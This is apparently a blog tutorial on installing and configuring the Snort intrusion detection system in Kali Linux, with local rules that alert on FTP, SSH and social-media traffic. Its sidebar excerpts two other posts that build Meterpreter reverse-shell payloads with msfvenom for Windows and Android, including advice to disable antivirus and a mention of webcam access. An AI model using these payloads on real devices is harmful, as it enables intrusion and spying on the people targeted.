Snort Installation & Configuration in Kali Linux

We will see the full process of how to perform the SNORT with all the steps :- 








STEP 1 :-  Firstly we have to change network settings as ahown below in order to perform snort :-






 


STEP 2 :-  Now type the following command in Kali Linux terminal to know the IP address of your kali machine/attacker machine :-

                  ifconfig







STEP 3 :-  Now type the following command in Kali Linux terminal to install snort :-

 

                  sudo apt install snort

 





In between the installation you will notice a window gets pop-up in which you have to write ‘your IP address of the Kali machine.16/24’ as shown in the below image :-  







STEP 4 :-  Now after the successful installation of snort type the following command to go into the directory in which snort is installed :-

                  cd /etc/snort







STEP 5 :-  Now we will see the configuration files of snort by typing the following command where we can edit/add our new rules as per choice :- 

                   ls -l








STEP 6 :- Now for the backup of snort files we will create a backup file incase if something happens to the original file by typing the following command :- 

      

                 sudo cp snort.conf snort.conf.back






 

STEP 7 :-  Now another copy of files is created for customizing the file by typing the following command :-

   

                  sudo cp snort.conf test_snort.conf







STEP 8 :-  Now type the following command to check if the snort is installed correctly without any error :-

 

                 sudo snort -T -i eth0 -c /etc/snort/test_snort.conf












STEP 9 :-  Now type the following command to modify the snort rules as per our need:  

                  cd /etc/snort/rules







STEP 10 :-  Now type the following command to add new rules :- 

 

                   sudo nano local.rules

 

In which type the following rules and hit ctrl+x to close and hit y to save rules :-

alert tcp any any -> $HOME_NET 21 (msg:"ftp connectionn attempt"; sid:1000001; rev:1;)

alert tcp any any -> $HOME_NET 22 (msg:"SSH cnnection attempt"; sid:1000002; rev:1;)

alert tcp any any -> any any (content:"www.facebook.com"; msg:”whoa! Some one Is visiting facebook at this time ”; sid:10000003; rev:1;)

alert tcp any any -> any any (content:"www.youtube.com"; msg:"Youtube alert...."; sid:1000004; rev:1;)

alert tcp any any -> any any (content:"www.instagram.com"; msg:"Instagram alert...."; sid:1000005; rev:1;)






STEP 11 :-  Now type the following command to start the snort console :-

 

                   sudo snort -A console -q -i eth0 -c /etc/snort/test_snort.conf






   Comments are Appreciated.


Comments

Post a Comment

Popular posts from this blog

Exploiting Windows 10 using "msfvenom''and "msfconsole''

Image
 STEP 1 :- Go to the Kali Linux terminal and type the following command as shown below:- msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=your IP of Kali lport=8080 -f exe > exploit name.exe STEP 2 :- Now the exe file is created so move it to your target machine (NOTE:- TURN OFF THE ANTIVIRUS TO EXECUTE THE FILE). STEP 3 :- Now type the following commands as follows:- msfconsole use exploit/multi/handler set payload w indows/x64/meterpreter/reverse_tcp set lhost your IP of Kali  set lport 8080 exploit  STEP 4 :- Now click on the exe file from your Target machine . STEP 5 :- Now you can able to see that session is created in Kali Linux . STEP 6 :- Now you have all control to your target machine which is windows machine in our case . STEP 7 :- I have shown you example by opening webcam of target machine . STEP 8 :- You can also use different commands to operate the target machine . To know the different commands type help and you will get all commands listed . That's it from
Read more

Exploiting Android using "msfvenom'' and "msfconsole''

Image
STEP 1 :- Go to the Kali Linux terminal and type the following command as shown below :-  msfvenom -p android/meterpreter/reverse_tcp lhost=your IP of Kali lport=8080 > exploit name.apk STEP 2 :- Now the apk file is created so move it to your Android phone . STEP 3 :- Now type the following commands as follows :-  msfconsole  use multi/handler set payload android/meterpreter/reverse_tcp set lhost your IP of Kali set lport 8080 exploit  STEP 4 :- Now go the apk file location and click on the apk file from android and install it . Give all permissions to app and install it .(NOTE :- CLICK ON INSTALL ANYWAY). STEP 5 :- After installing it click on the app and you will see that session is created in Kali Linux terminal . STEP 6 :- Now you have all the control or you android device . STEP 7 :- I have shown you an example by opening webcam in android device . STEP 8 :- You can use different commands to operate the android device .Just type help in your Kali Linux terminal and you will get
Read more